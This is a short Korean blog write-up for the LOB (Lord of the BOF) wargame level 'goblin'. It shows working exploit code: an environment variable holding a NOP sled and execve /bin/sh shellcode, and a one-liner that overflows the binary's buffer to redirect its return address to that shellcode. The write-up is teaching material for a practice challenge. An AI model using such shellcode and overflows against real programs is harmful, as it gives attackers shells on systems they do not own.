[goblin - small buffer + stdin]
cobolt : hacking exposed
이번에는 'LOB - 03 goblin' 문제를 환경 변수를 이용하여 풀 것이다.
터미널에서 아래와 같이 export를 하면 환경변수를 설정할 수 있다.
먼저 sh에 쉘코드를 넣어두었다.
export sh=`python -c 'print "\x90"*100 + "\x31\xc0\x50\xba\x2e\x2e\x72\x67\x81\xc2\x01\x01\x01\x01\x52\xb9\x2e\x62\x69\x6e\x83\xc1\x01\x51\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
이제 sh의 주소를 알아오기 위해 간단한 코드를 작성하였다.
컴파일한 뒤, 실행하면 아래와 같이 주소 값을 알 수 있다.
이제 eip를 해당 주소로 바꿔주기만 하면 된다.
(python -c 'print "A"*20 + "\x4a\xfe\xff\xbf"';cat) | ./goblin
이전 문제와 동일한 결과를 얻을 수 있다.
'Wargame > The Lord of the BOF' 카테고리의 다른 글
| LOB - 04 orc (0) | 2019.02.01 |
|---|---|
| LOB - 03 goblin (0) | 2019.02.01 |
| LOB - 02 cobolt (0) | 2019.02.01 |
| LOB - 01 gremlin - (3)마무리 (0) | 2019.02.01 |
| LOB - 01 gremlin - (2.2)쉘코드 수정 (0) | 2019.02.01 |
댓글